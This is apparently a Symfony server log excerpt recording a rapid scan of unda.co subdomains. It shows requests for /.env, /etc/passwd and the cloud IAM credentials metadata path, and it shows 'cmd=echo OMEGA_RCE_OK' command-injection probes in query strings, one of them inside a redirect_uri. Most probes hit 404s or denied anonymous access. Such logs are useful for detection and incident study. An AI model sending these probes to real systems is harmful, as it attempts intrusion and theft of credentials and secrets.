  1724. [2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1725. [2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1726. [2025-12-17 04:44:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1727. [2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1728. [2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1729. [2025-12-17 04:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1730. [2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1731. [2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1732. [2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1733. [2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1734. [2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1735. [2025-12-17 04:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1736. [2025-12-17 04:44:25] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  1737. [2025-12-17 04:44:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1738. [2025-12-17 04:44:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1739. [2025-12-17 04:44:25] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1740. [2025-12-17 04:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1741. [2025-12-17 04:44:26] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1742. [2025-12-17 04:44:26] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1743. [2025-12-17 04:44:26] security.DEBUG: Calling Authentication entry point. [] []
  1744. [2025-12-17 04:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1745. [2025-12-17 04:44:26] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  1746. [2025-12-17 04:44:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  1747. [2025-12-17 04:44:26] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  1748. [2025-12-17 04:44:26] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1749. [2025-12-17 04:44:26] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1750. [2025-12-17 04:44:26] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1751. [2025-12-17 04:44:26] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  1752. [2025-12-17 04:44:26] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1753. [2025-12-17 04:44:26] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1754. [2025-12-17 04:44:26] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1755. [2025-12-17 04:44:26] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1756. [2025-12-17 04:44:26] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1757. [2025-12-17 04:44:26] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1758. [2025-12-17 04:44:26] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1759. [2025-12-17 04:44:26] security.DEBUG: Calling Authentication entry point. [] []
  1760. [2025-12-17 04:44:26] security.DEBUG: Calling Authentication entry point. [] []
  1761. [2025-12-17 04:44:26] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  1762. [2025-12-17 04:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1763. [2025-12-17 04:44:26] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  1764. [2025-12-17 04:44:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  1765. [2025-12-17 04:44:27] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  1766. [2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1767. [2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1768. [2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1769. [2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1770. [2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1771. [2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1772. [2025-12-17 04:44:27] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  1773. [2025-12-17 04:44:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  1774. [2025-12-17 04:44:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1775. [2025-12-17 04:44:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1776. [2025-12-17 04:44:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1777. [2025-12-17 04:44:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1778. [2025-12-17 04:44:27] security.DEBUG: Calling Authentication entry point. [] []
  1779. [2025-12-17 04:44:27] security.DEBUG: Calling Authentication entry point. [] []
  1780. [2025-12-17 04:44:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  1781. [2025-12-17 04:44:27] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  1782. [2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1783. [2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1784. [2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1785. [2025-12-17 04:44:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  1786. [2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1787. [2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1788. [2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1789. [2025-12-17 04:44:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1790. [2025-12-17 04:44:27] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  1791. [2025-12-17 04:44:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1792. [2025-12-17 04:44:27] security.DEBUG: Calling Authentication entry point. [] []
  1793. [2025-12-17 04:44:27] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  1794. [2025-12-17 04:44:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  1795. [2025-12-17 04:44:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1796. [2025-12-17 04:44:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1797. [2025-12-17 04:44:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  1798. [2025-12-17 04:44:27] security.DEBUG: Calling Authentication entry point. [] []
  1799. [2025-12-17 04:44:27] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  1800. [2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1801. [2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1802. [2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1803. [2025-12-17 04:44:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  1804. [2025-12-17 04:44:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1805. [2025-12-17 04:44:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1806. [2025-12-17 04:44:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1807. [2025-12-17 04:44:27] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  1808. [2025-12-17 04:44:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  1809. [2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1810. [2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  1811. [2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1812. [2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
  1813. [2025-12-17 04:44:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  1814. [2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1815. [2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1816. [2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
  1817. [2025-12-17 04:44:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
  1818. [2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1819. [2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1820. [2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1821. [2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  1822. [2025-12-17 04:44:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  1823. [2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1824. [2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1825. [2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1826. [2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  1827. [2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1828. [2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1829. [2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
  1830. [2025-12-17 04:44:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  1831. [2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1832. [2025-12-17 04:44:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  1833. [2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1834. [2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
  1835. [2025-12-17 04:44:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Decho%2520OMEGA_RCE_OK","method":"GET"} []
  1836. [2025-12-17 04:44:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
  1837. [2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  1838. [2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
  1839. [2025-12-17 04:44:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
  1840. [2025-12-17 04:44:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
  1841. [2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
